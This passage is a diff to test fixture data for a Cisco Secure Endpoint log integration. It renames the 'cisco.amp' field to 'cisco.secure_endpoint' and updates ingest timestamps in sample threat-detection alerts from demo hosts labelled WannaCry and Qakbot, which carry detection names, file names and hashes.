Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -501,7 +501,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -586,7 +586,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929476066Z",
+                "ingested": "2021-09-27T00:42:13.513668119Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -597,7 +597,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -675,7 +675,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929477971Z",
+                "ingested": "2021-09-27T00:42:13.513669865Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -686,7 +686,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -760,7 +760,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929479867Z",
+                "ingested": "2021-09-27T00:42:13.513671602Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -771,7 +771,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -833,7 +833,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929481750Z",
+                "ingested": "2021-09-27T00:42:13.513673328Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -843,7 +843,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -904,7 +904,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929483818Z",
+                "ingested": "2021-09-27T00:42:13.513675248Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -914,7 +914,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -975,7 +975,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929485735Z",
+                "ingested": "2021-09-27T00:42:13.513676958Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -985,7 +985,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1058,7 +1058,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929487600Z",
+                "ingested": "2021-09-27T00:42:13.513678727Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1069,7 +1069,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1156,7 +1156,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929489505Z",
+                "ingested": "2021-09-27T00:42:13.513680440Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1167,7 +1167,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1256,7 +1256,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929491390Z",
+                "ingested": "2021-09-27T00:42:13.513682171Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1267,7 +1267,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1354,7 +1354,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929493387Z",
+                "ingested": "2021-09-27T00:42:13.513692566Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1365,7 +1365,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1456,7 +1456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929495259Z",
+                "ingested": "2021-09-27T00:42:13.513694411Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1467,7 +1467,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1533,7 +1533,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929497150Z",
+                "ingested": "2021-09-27T00:42:13.513696174Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1543,7 +1543,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1608,7 +1608,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929499044Z",
+                "ingested": "2021-09-27T00:42:13.513697923Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1618,7 +1618,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1683,7 +1683,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929500941Z",
+                "ingested": "2021-09-27T00:42:13.513699667Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective 